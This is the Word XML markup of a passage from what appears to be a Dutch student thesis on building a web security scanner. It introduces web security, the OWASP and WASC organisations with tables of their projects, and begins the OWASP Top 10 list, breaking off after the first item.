    <w:p w14:paraId="73561165" w14:textId="77777777" w:rsidR="00940DA7" w:rsidRDefault="00940DA7" w:rsidP="004E1E32"/>
    <w:p w14:paraId="2782D8F4" w14:textId="12E80ED8" w:rsidR="00282839" w:rsidRDefault="00B71932" w:rsidP="004E1E32">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Welke technologie</w:t>
      </w:r>
      <w:r w:rsidR="00F45444">
        <w:t>ën zijn geschikt voor de Web Security Scanner?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8E3069" w14:textId="015418B0" w:rsidR="00851242" w:rsidRDefault="000A2443" w:rsidP="004E1E32">
      <w:r>
        <w:t xml:space="preserve">Er zijn vele programmatalen waarmee software </w:t>
      </w:r>
      <w:r w:rsidR="00BF0D2E">
        <w:t>geschreven kan worden maar welke is het meest geschikt voor mijn situatie.</w:t>
      </w:r>
      <w:r w:rsidR="001D713A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC6997">
        <w:t xml:space="preserve">In dit deel heb ik onderzoek gedaan naar de verschillende technologieën </w:t>
      </w:r>
      <w:r w:rsidR="002359AC">
        <w:t>die ik kan gebruiken voor het ontwikkelen van de Web Security Scanner.</w:t>
      </w:r>
      <w:r w:rsidR="00E228BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C71B2">
        <w:t>Een webapplicatie bestaat uit subsystemen in het ge</w:t>
      </w:r>
      <w:r w:rsidR="00BF0C92">
        <w:t xml:space="preserve">val van de Web Security Scanner </w:t>
      </w:r>
      <w:r w:rsidR="00FC7D8E">
        <w:t xml:space="preserve">zijn deze: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FC7D8E">
        <w:t>CMS extensie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FC7D8E">
        <w:t>, REST API, Scan applicatie</w:t>
      </w:r>
      <w:r w:rsidR="000A7D18">
        <w:t xml:space="preserve"> en de Database</w:t>
      </w:r>
      <w:r w:rsidR="003F7BB6">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008524B1">
        <w:t xml:space="preserve">Elke subsysteem zal met een ander technologie moeten worden ontwikkeld. Ik </w:t>
      </w:r>
      <w:r w:rsidR="00BB4E91">
        <w:t>zal per subsysteem de verschillende technologieën vergelijken om zo een goed onderbouwde keuze te kunnen maken.</w:t>
      </w:r>
      <w:r w:rsidR="005672A6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDFB91B" w14:textId="77777777" w:rsidR="00813FA2" w:rsidRDefault="00813FA2" w:rsidP="004E1E32"/>
    <w:p w14:paraId="4B055294" w14:textId="4876B5B8" w:rsidR="00573A86" w:rsidRPr="00723BE8" w:rsidRDefault="006A33B8" w:rsidP="006A33B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc491022059"/>
      <w:r>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="00DA5B86">
        <w:t xml:space="preserve"> W</w:t>
      </w:r>
      <w:r w:rsidR="004D61D9" w:rsidRPr="00723BE8">
        <w:t xml:space="preserve">eb </w:t>
      </w:r>
      <w:r w:rsidR="00B674DC" w:rsidRPr="00723BE8">
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="007F2C89">
        <w:t xml:space="preserve"> en de kwetsbaarheden</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="619439E2" w14:textId="71449030" w:rsidR="008041D7" w:rsidRDefault="004D61D9">
      <w:r>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r w:rsidR="00E24444">
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r w:rsidR="00D74EB5">
        <w:t xml:space="preserve">is een </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vertakking van </w:t>
      </w:r>
      <w:r w:rsidR="00FE3F03">
        <w:t>Informatiebeveiliging</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F0ED1">
        <w:t xml:space="preserve">dat zich specifiek </w:t>
      </w:r>
      <w:r w:rsidR="00014E90">
        <w:t>bezighoudt</w:t>
      </w:r>
      <w:r w:rsidR="0038769D">
        <w:t xml:space="preserve"> met het beveiligen</w:t>
      </w:r>
      <w:r w:rsidR="004F0ED1">
        <w:t xml:space="preserve"> van websites. </w:t>
      </w:r>
      <w:r w:rsidR="0038769D">
        <w:t>Web security</w:t>
      </w:r>
      <w:r w:rsidR="00D37B3A">
        <w:t xml:space="preserve"> werd echter pas een probleem me</w:t>
      </w:r>
      <w:r w:rsidR="004D3A8D">
        <w:t xml:space="preserve">t de komst van web 2.0. </w:t>
      </w:r>
      <w:r w:rsidR="00531F47">
        <w:t>Bij d</w:t>
      </w:r>
      <w:r w:rsidR="004D3A8D">
        <w:t>e voorganger</w:t>
      </w:r>
      <w:r w:rsidR="00851056">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004D3A8D">
        <w:t xml:space="preserve"> web 1.0 konden gebruikers voornamelijk alleen informatie te bekijken. </w:t>
      </w:r>
      <w:r w:rsidR="0038769D">
        <w:t xml:space="preserve">Bij web 2.0 kregen gebruikers meer </w:t>
      </w:r>
      <w:r w:rsidR="004D3A8D">
        <w:t>re</w:t>
      </w:r>
      <w:r w:rsidR="006F7EC2">
        <w:t>chten</w:t>
      </w:r>
      <w:r w:rsidR="00F6544C">
        <w:t xml:space="preserve"> op een website, </w:t>
      </w:r>
      <w:r w:rsidR="00126E03">
        <w:t>hierdoor</w:t>
      </w:r>
      <w:r w:rsidR="001A6DF1">
        <w:t xml:space="preserve"> konden g</w:t>
      </w:r>
      <w:r w:rsidR="000F4A4F">
        <w:t>ebruikers naast</w:t>
      </w:r>
      <w:r w:rsidR="006F7EC2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F4A4F">
        <w:t>het bekijken van informatie ook informatie</w:t>
      </w:r>
      <w:r w:rsidR="00BE1C59">
        <w:t xml:space="preserve"> creëren en</w:t>
      </w:r>
      <w:r w:rsidR="000F4A4F">
        <w:t xml:space="preserve"> bewerken. </w:t>
      </w:r>
      <w:r w:rsidR="00BE1C59">
        <w:t xml:space="preserve">Voorbeeld hiervan is het aanmaken van </w:t>
      </w:r>
      <w:r w:rsidR="00A3249F">
        <w:t>ac</w:t>
      </w:r>
      <w:r w:rsidR="00AC5D8E">
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidR="00652CF6">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00AC5D8E">
        <w:t xml:space="preserve"> voor een </w:t>
      </w:r>
      <w:r w:rsidR="00014E90">
        <w:t>internetdienst</w:t>
      </w:r>
      <w:r w:rsidR="00AC5D8E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E40BC7">
        <w:t xml:space="preserve">Deze veranderingen brachten </w:t>
      </w:r>
      <w:r w:rsidR="00677D13">
        <w:t xml:space="preserve">niet alleen innovatie met zich mee maar ook </w:t>
      </w:r>
      <w:r w:rsidR="00E40BC7">
        <w:t>veel</w:t>
      </w:r>
      <w:r w:rsidR="006C7E64">
        <w:t xml:space="preserve"> security issues. </w:t>
      </w:r>
      <w:r w:rsidR="005462AE">
        <w:t xml:space="preserve">Een van deze security issues gebeurt bij </w:t>
      </w:r>
      <w:r w:rsidR="005528A8">
        <w:t xml:space="preserve">het verzenden van </w:t>
      </w:r>
      <w:r w:rsidR="001823E5">
        <w:t xml:space="preserve">informatie naar </w:t>
      </w:r>
      <w:r w:rsidR="00AD2E0B">
        <w:t>servers</w:t>
      </w:r>
      <w:r w:rsidR="00347985">
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
      <w:r w:rsidR="005462AE">
        <w:t xml:space="preserve"> de vorm van een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005462AE">
        <w:t>requests</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005462AE">
        <w:t xml:space="preserve"> (verzoeken)</w:t>
      </w:r>
      <w:r w:rsidR="00B03503">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002374FC">
        <w:t xml:space="preserve"> wat een</w:t>
      </w:r>
      <w:r w:rsidR="001B12D0">
        <w:t xml:space="preserve"> vorm is van communicatie tussen gebruiker en server</w:t>
      </w:r>
      <w:r w:rsidR="00BB708E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B03503">
        <w:t xml:space="preserve"> Hackers gebruiken deze </w:t>
      </w:r>
      <w:r w:rsidR="006965B3">
        <w:t>communicatiemiddel</w:t>
      </w:r>
      <w:r w:rsidR="00B03503">
        <w:t xml:space="preserve"> om websites te comprimeren door kwaadaardige </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B03503">
        <w:t>requests</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B03503">
        <w:t xml:space="preserve"> te verzenden om bijvoorbeeld een website offline te halen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AB3522" w14:textId="43D741CD" w:rsidR="0075337E" w:rsidRDefault="00690DCD">
      <w:r>
        <w:t>Er zijn een aantal non-profit organisati</w:t>
      </w:r>
      <w:r w:rsidR="00C749C3">
        <w:t>es die zich bezighouden met</w:t>
      </w:r>
      <w:r w:rsidR="00247461">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E57B9">
        <w:t xml:space="preserve">het onderzoeken, documenteren en ontwikkelen van web </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001E57B9">
        <w:t>security applicaties</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001E57B9">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001D4DF6">
        <w:t xml:space="preserve">Die doen zij door open source projecten te starten waar iedereen met een interesse in web security aan kan meedoen. </w:t>
      </w:r>
      <w:r w:rsidR="00C937D1">
        <w:t>Er zijn twee wel bekende organisaties</w:t>
      </w:r>
      <w:r w:rsidR="00652B50">
        <w:t>, OWASP en WASC</w:t>
      </w:r>
      <w:r w:rsidR="000A4931">
        <w:t>. Beide</w:t>
      </w:r>
      <w:r w:rsidR="00DD432A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A4931">
        <w:t xml:space="preserve">hebben </w:t>
      </w:r>
      <w:r w:rsidR="00DD432A">
        <w:t>over de jaren heen succesvoll</w:t>
      </w:r>
      <w:r w:rsidR="00C430A8">
        <w:t>e projecten hebben geproduceerd</w:t>
      </w:r>
      <w:r w:rsidR="000A4931">
        <w:t xml:space="preserve"> en hebben een actieve community die </w:t>
      </w:r>
      <w:r w:rsidR="00135CC8">
        <w:t>de projecten onderhouden</w:t>
      </w:r>
      <w:r w:rsidR="00C430A8">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00185857">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5D253B" w14:textId="0B608941" w:rsidR="00BA6377" w:rsidRDefault="00BA6377">
      <w:r>
        <w:t>OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CC9C5F" w14:textId="6E679C6E" w:rsidR="007C2EA7" w:rsidRDefault="00B30898">
      <w:r>
        <w:t>De Open Web Application Security Project</w:t>
      </w:r>
      <w:r w:rsidR="00402668">
        <w:t>, opgericht in 2001,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is een wereldwijde non-profit organisatie dat zich </w:t>
      </w:r>
      <w:r w:rsidR="006965B3">
        <w:t>bezighoudt</w:t>
      </w:r>
      <w:r w:rsidR="00E42C50">
        <w:t xml:space="preserve"> met het verbeteren van web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> security. De missie van OWASP vangt </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>één</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> van de essentiële concepten van software security. Hun missie is om software </w:t>
      </w:r>
      <w:r w:rsidR="00786CC2">
        <w:t>security zichtbaar te maken, zo</w:t>
      </w:r>
      <w:r>
        <w:t>dat individuen en organisaties geïnformeerde keuzes kunnen maken. Iedereen kan een bijdragen met de open-source projecten van OWASP, het heeft een gratis en open software licentie.</w:t>
      </w:r>
      <w:r w:rsidR="00AE19A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C2EA7">
        <w:t>OWASP heeft over 93 actieve projecten waarvan er een aantal gelabeld worden als volwassen.</w:t>
      </w:r>
      <w:r w:rsidR="00CD13FB">
        <w:t xml:space="preserve"> Relevante projecten die ik zal behandelen in dit </w:t>
      </w:r>
      <w:r w:rsidR="00DE1933">
        <w:t>document</w:t>
      </w:r>
      <w:r w:rsidR="00CD13FB">
        <w:t xml:space="preserve"> zijn:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1271"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="2268"/>
      </w:tblGrid>
      <w:tr w:rsidR="008668EF" w14:paraId="15CA7AFD" w14:textId="77777777" w:rsidTr="00160A1A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="010BE3D3" w14:textId="2E250FD0" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:r>
              <w:t>Classificatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="402FD0D9" w14:textId="14489431" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:r>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="056BDB58" w14:textId="07F23936" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:r>
              <w:t>Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008668EF" w14:paraId="098783D6" w14:textId="77777777" w:rsidTr="00160A1A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13DD0259" w14:textId="1FDC9486" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:r>
              <w:t>Volwassen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20AFB9EB" w14:textId="22E49B0A" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:r>
              <w:t>Documentatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="107C3EF2" w14:textId="7E4F52F5" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:r>
              <w:t>Top 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008668EF" w14:paraId="63ED4312" w14:textId="77777777" w:rsidTr="00160A1A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ED96BE1" w14:textId="2062F4E4" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:r>
              <w:t>Volwassen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="660C66FC" w14:textId="3B93745A" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:r>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04D7BFFF" w14:textId="6F41E85B" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:r>
              <w:t>ZAP Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008668EF" w14:paraId="210632EE" w14:textId="77777777" w:rsidTr="00160A1A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2032F48A" w14:textId="0B42D83E" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DDC144B" w14:textId="2889D542" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:r>
              <w:t>Documentatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F0369FF" w14:textId="4D365640" w:rsidR="008668EF" w:rsidRDefault="00160A1A">
            <w:r>
              <w:t>Code Review Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008668EF" w14:paraId="10CD72E8" w14:textId="77777777" w:rsidTr="00160A1A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05DC9F65" w14:textId="7F2CF2E5" w:rsidR="008668EF" w:rsidRDefault="00E21220">
            <w:r>
              <w:t>Volwassen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BDB8B61" w14:textId="3FC25999" w:rsidR="008668EF" w:rsidRDefault="00E21220">
            <w:r>
              <w:t>Documentatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="307EF017" w14:textId="74BE8CDB" w:rsidR="008668EF" w:rsidRDefault="00E21220">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Testing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Guide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48D9A722" w14:textId="7A371FB0" w:rsidR="00E21220" w:rsidRDefault="002F0F65">
      <w:r>
        <w:t>Tabel 3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4104F5DF" w14:textId="1C0FB3F9" w:rsidR="00DD682C" w:rsidRDefault="001763A1">
      <w:r>
        <w:t>WASC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57138CAC" w14:textId="06E6DD21" w:rsidR="003A6253" w:rsidRDefault="00E42C50">
      <w:r>
        <w:t xml:space="preserve">De Web Application Security Consortium is zoals OWASP een organisatie met als missie om web security te verbeteren. Hun hoofdmissie is om een standaard te ontwikkelen voor </w:t>
      </w:r>
      <w:r w:rsidR="00650F16">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> security. </w:t>
      </w:r>
      <w:r w:rsidR="00D25A89">
        <w:t xml:space="preserve">Zij bestaan uit een internationale groep van experts en organisatie vertegenwoordigers </w:t>
      </w:r>
      <w:r w:rsidR="00AE40DE">
        <w:t xml:space="preserve">die open source en best </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE40DE">
        <w:t>practice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AE40DE">
        <w:t xml:space="preserve"> security standaards prod</w:t>
      </w:r>
      <w:r w:rsidR="002F7AEC">
        <w:t xml:space="preserve">uceren voor de </w:t>
      </w:r>
      <w:r w:rsidR="00650F16">
        <w:t>wereldwijde</w:t>
      </w:r>
      <w:r w:rsidR="002F7AEC">
        <w:t xml:space="preserve"> web. Zij houden zich echter niet bezig met het ontwikkelen van softwaretools. </w:t>
      </w:r>
      <w:r w:rsidR="003A6253">
        <w:t xml:space="preserve">Maar zijn meer gericht op het publiceren van artikelen, onderzoeksrapporten en zoals eerder </w:t>
      </w:r>
      <w:r w:rsidR="003A6253">
        <w:lastRenderedPageBreak/>
        <w:t>vermeld standaarden voor web security.</w:t>
      </w:r>
      <w:r w:rsidR="00D95A72">
        <w:t xml:space="preserve"> WASC classificeert hub projecten niet en het valt mij op dat deze voor een lange tijd niet zijn onderhouden.</w:t>
      </w:r>
      <w:r w:rsidR="00EF655A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004578E6">
        <w:t xml:space="preserve">Relevante projecten </w:t>
      </w:r>
      <w:r w:rsidR="00DE1933">
        <w:t>die ik zal behandelen document zijn:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1838"/>
        <w:gridCol w:w="4678"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CD13FB" w14:paraId="28C589DD" w14:textId="77777777" w:rsidTr="00DE1933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57EF6456" w14:textId="25FA9E06" w:rsidR="00CD13FB" w:rsidRDefault="00314727">
            <w:r>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15E90DDD" w14:textId="7C2CBB44" w:rsidR="00CD13FB" w:rsidRDefault="00314727">
            <w:r>
              <w:t>Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD13FB" w:rsidRPr="00422628" w14:paraId="519686FA" w14:textId="77777777" w:rsidTr="00DE1933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D46AE10" w14:textId="7FED4886" w:rsidR="00CD13FB" w:rsidRDefault="00DE1933">
            <w:r>
              <w:t>Documentatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B90804A" w14:textId="5B54E4EC" w:rsidR="00CD13FB" w:rsidRPr="00DE1933" w:rsidRDefault="00DE1933">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE1933">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Web Application Security Scanner Evaluation Criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD13FB" w:rsidRPr="00DE1933" w14:paraId="5E32036F" w14:textId="77777777" w:rsidTr="00DE1933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16C4F479" w14:textId="01ABCEC1" w:rsidR="00CD13FB" w:rsidRPr="00DE1933" w:rsidRDefault="003F1FB8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Documentaite</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CE37CA8" w14:textId="0F6437CC" w:rsidR="00CD13FB" w:rsidRPr="00DE1933" w:rsidRDefault="00DE1933">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>WASC Threat Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="276006FC" w14:textId="3F149319" w:rsidR="00B40D31" w:rsidRPr="00DE1933" w:rsidRDefault="00D25A89">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE1933">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E42C50" w:rsidRPr="00DE1933">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F0F65">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Table 3.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618B6CC8" w14:textId="1E136466" w:rsidR="003B11B2" w:rsidRDefault="006A33B8" w:rsidP="006A33B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc491022060"/>
      <w:r>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="00740679" w:rsidRPr="00FC3328">
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="003B11B2" w:rsidRPr="00FC3328">
        <w:t>OWASP top 10 lijst</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="2149AB55" w14:textId="71B36CCC" w:rsidR="00EA2FDA" w:rsidRPr="00FC3328" w:rsidRDefault="00EA2FDA" w:rsidP="003B11B2">
      <w:r w:rsidRPr="00D21D29">
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D21D29">
        <w:t>OWASP top</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D21D29">
        <w:t xml:space="preserve"> 10 lijst representeert een overeenstemming over de meest </w:t>
      </w:r>
      <w:r w:rsidR="009E50BB" w:rsidRPr="00D21D29">
        <w:t>kritische</w:t>
      </w:r>
      <w:r w:rsidRPr="00D21D29">
        <w:t xml:space="preserve"> security risico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’s voor </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t>s.</w:t>
      </w:r>
      <w:r w:rsidR="006B05D9">
        <w:t xml:space="preserve"> OWASP dringt bedrijven aan om dit project te implementeren in het bedrijfsproces om de risico’s op hun </w:t>
      </w:r>
      <w:r w:rsidR="00471568">
        <w:t>webapplicaties</w:t>
      </w:r>
      <w:r w:rsidR="006B05D9">
        <w:t xml:space="preserve"> te minimaliseren. </w:t>
      </w:r>
      <w:r w:rsidR="0016583B">
        <w:t xml:space="preserve">De lijst is aflopend gesorteerd op de meest voorkomende </w:t>
      </w:r>
      <w:r w:rsidR="00471568">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="0016583B">
        <w:t xml:space="preserve"> risico. </w:t>
      </w:r>
      <w:r w:rsidR="0029755A">
        <w:t>De 10 security risico’s zijn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD92054" w14:textId="77777777" w:rsidR="003B11B2" w:rsidRPr="00AE19A9" w:rsidRDefault="003B11B2" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE19A9">
        <w:t xml:space="preserve">A1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE19A9">
        <w:t>Injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="70BA1107" w14:textId="53D3FE22" w:rsidR="003B11B2" w:rsidRPr="00E12430" w:rsidRDefault="003B11B2" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
